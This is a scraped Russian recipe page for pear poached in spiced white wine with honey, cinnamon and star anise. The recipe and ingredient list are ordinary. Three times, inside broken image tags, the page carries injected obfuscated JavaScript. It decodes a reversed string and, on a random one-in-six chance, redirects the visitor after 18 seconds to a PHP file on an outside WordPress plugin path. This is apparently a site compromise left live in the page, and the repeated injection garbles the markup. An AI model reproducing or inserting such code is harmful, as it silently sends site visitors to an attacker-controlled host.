Десерт дня: груша в винном соусе

Сочная груша, приготовленная в пряном винном соусе, — одно из самых популярных блюд в фестивальном китайском меню паназиатского ресторана «Недальний Восток». Как его приготовить дома — рассказывает шеф-повар.

60 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-prigotovit-s-grushami-5-osennih-receptov-im-11.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-prigotovit-s-grushami-5-osennih-receptov-im-11.jpg»>

Груша в винном соусе

Для этого рецепта лучше всего подойдёт белое вино сорта Sauvignon Blanc.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-prigotovit-s-grushami-5-osennih-receptov-im-11.jpg» class=»c2″ alt=»Изображение рецепта Груша в винном соусе» title=»Изображение рецепта Груша в винном соусе»>

Груша в винном соусе

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

120 минут

PT2H

PT2H

КОЛИЧЕСТВО ПОРЦИЙ:

1 порция

КАЛОРИЙНОСТЬ:

60 ккал

Сложность

Время

120 минут

Кол-во порций

1 порция

Калорийность

60 ккал

Ингредиенты

Груша

150 г

Вино (белое Sauvignon Blanc)

60 мл

Мёд

60 г

Сахар (тростниковый)

45 г

Корица (палочки)

10 г

Бадьян

3 г

Вода

250 мл

Процесс приготовления

  1. Налейте воду в сотейник, добавьте сахар и доведите до кипения.
  2. Добавьте в сотейник вино, бадьян, корицу и мёд. Перемешайте.
  3. Очистите грушу от кожуры, опустите в полученный сироп и варите на медленном огне 1,5—2 часа, пока она не станет мягкой.
  4. Остудите грушу, выложите на тарелку и украсьте палочкой корицы и бадьяном.

Статьи по теме

Десерт дня: запечённые груши с кешью-кремом

Рецепт дня: салат с сельдереем и грушей

Как выбрать хорошее вино — в магазине и в ресторане

Как правильно сочетать вино и еду: 9 советов от сомелье

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector